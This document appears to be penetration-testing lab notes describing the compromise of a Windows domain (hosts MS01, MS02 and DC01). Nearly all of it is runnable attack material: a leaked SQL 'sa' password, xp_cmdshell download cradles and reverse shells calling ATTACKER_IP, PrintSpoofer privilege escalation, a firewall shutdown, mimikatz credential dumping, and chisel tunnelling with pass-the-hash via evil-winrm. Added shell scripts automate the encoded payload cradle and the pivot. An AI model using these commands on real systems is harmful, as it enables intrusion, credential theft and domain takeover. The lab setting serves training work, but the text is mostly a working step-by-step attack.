192.168.xx.101 (MS01) : Port 80 /robots

The document details a penetration testing process on a server (MS01) with various open ports and services, including Microsoft IIS and SQL Server. It outlines initial access through a phpinfo.php file, obtaining database credentials, and executing commands for privilege escalation using tools like Mimikatz and Netcat. The process culminates in gaining administrator access and performing lateral movement to other domain controllers using pass-the-hash techniques.

Uploaded by laenapanga

MS01 V2

192.168.xx.101 (MS01)

80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-generator: Nicepage 4.10.5, nicepage.com
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
| http-robots.txt: 1 disallowed entry
|_phpinfo.php
|_http-title: Home
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49671/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC

1434/udp open ms-sql-m Microsoft SQL Server 15.0.2000.5 (ServerName: MS01; TCPPort: 1433)

INITIAL ACCESS

Port 80

/robots.txt has a single disallowed entry, which is exactly the file worth looking at:

phpinfo.php

http://192.168.xx.101/phpinfo.php

Found DB Credentials

Credentials: sa:D@t@b@535

We can log in to the MSSQL server with either

https://raw.githubusercontent.com/Alamot/code-snippets/master/mssql/mssql_shell.py

or impacket's mssqlclient:

mssqlclient.py MS01/sa@192.168.xx.101

(type the password at the prompt: impacket parses the user:password@host form with the last "@", so a password containing "@" cannot be passed inline)

xp_cmdshell isn't enabled by default, so inside mssqlclient we run its helper

enable_xp_cmdshell

which executes sp_configure 'show advanced options', 1 and sp_configure 'xp_cmdshell', 1, each followed by RECONFIGURE, on our behalf.

Now we can execute commands

Get a reverse shell with a PowerShell reverse-shell payload such as nishang's Invoke-PowerShellTcp, saved as rev.ps1 with the invocation line (pointing at ATTACKER_IP and the listener port) appended.

We serve rev.ps1 over HTTP and run a listener on the port the payload calls back to:

rlwrap -cAr nc -lvp 445

Then we run this through xp_cmdshell to fetch and execute the payload (it runs as the SQL Server service account):

EXEC xp_cmdshell 'echo IEX(New-Object Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1") | powershell -noprofile'
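As an added example (not part of the original notes), a small shell helper that builds the xp_cmdshell download-cradle statement with correct T-SQL quoting, plus an -EncodedCommand variant that avoids quoting problems entirely. The URL in the usage call is a placeholder, not an address from the engagement.

```shell
#!/usr/bin/env bash
# Added example: build the xp_cmdshell statement that pulls and runs rev.ps1.
# The attacker URL used below is a placeholder, not an address from the notes.

# T-SQL string literals are single-quoted; every single quote inside the
# command must be doubled or the statement breaks.
sql_quote() {
  printf '%s' "$1" | sed "s/'/''/g"
}

# powershell -EncodedCommand wants base64 of the UTF-16LE command text.
# Pure shell for ASCII-only input: emit each character followed by a NUL byte.
ps_encode() {
  s=$1
  while [ -n "$s" ]; do
    rest=${s#?}
    printf '%s\0' "${s%"$rest"}"
    s=$rest
  done | base64 | tr -d '\n'
}

# The PowerShell cradle itself, same shape as the one in the notes.
cradle_ps() {
  printf "IEX(New-Object Net.WebClient).DownloadString('%s')" "$1"
}

# Plain form: cmd.exe -> powershell -c "...". The single quotes around the URL
# are doubled by sql_quote so they survive inside the T-SQL literal.
cradle_plain() {
  printf "EXEC xp_cmdshell 'powershell -noprofile -c \"%s\"'" "$(sql_quote "$(cradle_ps "$1")")"
}

# Encoded form: no quotes reach cmd.exe or T-SQL at all, which is the robust
# choice when the payload mixes both quote kinds or contains $variables.
cradle_encoded() {
  printf "EXEC xp_cmdshell 'powershell -noprofile -enc %s'" "$(ps_encode "$(cradle_ps "$1")")"
}

# Usage (placeholder address): paste the output at the mssqlclient SQL> prompt.
cradle_plain   "http://ATTACKER_IP/rev.ps1"; echo
cradle_encoded "http://ATTACKER_IP/rev.ps1"; echo
```

The encoded form is what to reach for when the plain one fails with an odd syntax error: three quoting layers (T-SQL, cmd.exe, PowerShell) are hard to keep straight by hand, and base64 of UTF-16LE collapses them to one token.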

PRIV ESC

We move to a folder where we have write permissions

cd c:\users\public

Uploading PrintSpoofer (it abuses SeImpersonatePrivilege, which the SQL Server service account normally holds; confirm with whoami /priv first, otherwise it cannot work)

certutil.exe -f -urlcache -split http://ATTACKER_IP/PrintSpoofer.exe PrintSpoofer.exe

Uploading Netcat

certutil.exe -f -urlcache -split http://ATTACKER_IP/nc.exe nc.exe

Run a netcat listener on port 443 on the attacker box, then run:

.\PrintSpoofer.exe -i -c "nc.exe ATTACKER_IP 443 -e cmd.exe"

GOT SYSTEM

GET PROOF

Disabling the firewall

netsh firewall set opmode mode=disable profile=all

(This turns off the Windows firewall, not the AV. The netsh firewall context is deprecated; on current builds the equivalent is netsh advfirewall set allprofiles state off.)

Post Exploitation

Uploading mimikatz

certutil.exe -f -urlcache -split http://ATTACKER_IP/mimi64.exe mimi64.exe

Run mimikatz (as SYSTEM) to dump the credentials cached in LSASS

.\mimi64.exe
privilege::debug
sekurlsa::logonpasswords

Domain users

Domain user dumped from mimikatz:

tom.green
NTLM hash

192.168.xx.102 (MS02)

We have a domain user and his NTLM hash, so we'll do a pass-the-hash attack

Pivoting + PTH

First start the chisel server on the attacker box (it must be listening before the client connects):

./chisel_linux_1.7.7 server -p 9001 --reverse --socks5

Then upload chisel to the target machine and connect back, which opens a reverse SOCKS listener on attacker port 8001:

certutil.exe -f -urlcache -split http://ATTACKER_IP/chisel_windows_1_7_7.exe chisel_windows_1_7_7.exe

.\chisel_windows_1_7_7.exe client ATTACKER_IP:9001 R:8001:socks

Edit proxychains conf so the [ProxyList] entry reads socks5 127.0.0.1 8001, then pass the hash over the tunnel to MS02's internal address (not localhost, which would not reach MS02):

proxychains4 evil-winrm -i 192.168.xx.102 -u "tom.green" -H "HASH"

1. After we get the shell, upload mimikatz again to look for the Administrator account

2. Found user Administrator and its NTLM hash; repeat the pass-the-hash with evil-winrm

3. Now we have access as Administrator
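The "edit proxychains conf" step above is where pivots most often go wrong (a stale socks4 9050 entry left under strict_chain, or the chisel client started before the server). Added example, not from the original notes: the attacker-side half of the pivot as shell functions. Ports 9001/8001 and the MS02 address follow the notes; the chisel binary path and the use of ss to wait for the SOCKS port are assumptions.

```shell
#!/usr/bin/env bash
# Added example: attacker-side half of the chisel pivot. Ports (9001 chisel,
# 8001 reverse SOCKS) and the MS02 address follow the notes; the rest is assumed.

# Point proxychains at the chisel reverse SOCKS listener. Existing proxy lines
# under [ProxyList] (e.g. the stock socks4 127.0.0.1 9050 tor entry) are dropped,
# so a dead entry can't make every connection fail under strict_chain.
set_proxychains_socks() {
  conf=$1 port=$2
  tmp=$(mktemp)
  awk -v port="$port" '
    /^\[ProxyList\]/ { print; print "socks5 127.0.0.1 " port; inlist = 1; next }
    inlist && /^(socks4|socks5|http)[[:space:]]/ { next }
    { print }
  ' "$conf" > "$tmp" && mv "$tmp" "$conf"
}

# Show the proxy lines currently in force, to eyeball before pivoting.
proxychains_proxies() {
  awk '/^\[ProxyList\]/ { inlist = 1; next }
       inlist && /^(socks4|socks5|http)[[:space:]]/' "$1"
}

# Order matters: the server must be listening before the chisel client on MS01
# connects, and the SOCKS port only appears once that client is in. The WinRM
# target is MS02's internal address; "localhost" would either bypass the proxy
# or land on MS01's own WinRM through the tunnel, never on MS02.
pivot_pth() {
  target=$1 user=$2 ntlm=$3 socks_port=${4:-8001}
  ./chisel_linux_1.7.7 server -p 9001 --reverse --socks5 &
  # now on MS01:  .\chisel_windows_1_7_7.exe client ATTACKER_IP:9001 R:8001:socks
  until ss -ltn 2>/dev/null | grep -q ":${socks_port} "; do sleep 1; done
  proxychains4 -q evil-winrm -i "$target" -u "$user" -H "$ntlm"
}

# Usage (not run here):
#   set_proxychains_socks /etc/proxychains4.conf 8001
#   pivot_pth 192.168.xx.102 tom.green "$HASH"
```

Keep proxy_dns enabled in the config if MS02 is addressed by name rather than IP; with it off, the name is resolved on the attacker box, which cannot see the internal DNS.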

192.168.xx.100 (DC01)

1. Run net group "Domain Admins" /domain to list the domain admins; the user nicola pitch is one of them

2. Find that user in the earlier mimikatz output and take the NTLM hash or cleartext password

3. Repeat with evil-winrm against the DC (DC02) as that user for lateral movement to another DC

4. Again upload mimikatz and run it to get the Administrator account's NTLM hash

5. Get a shell again using evil-winrm as Administrator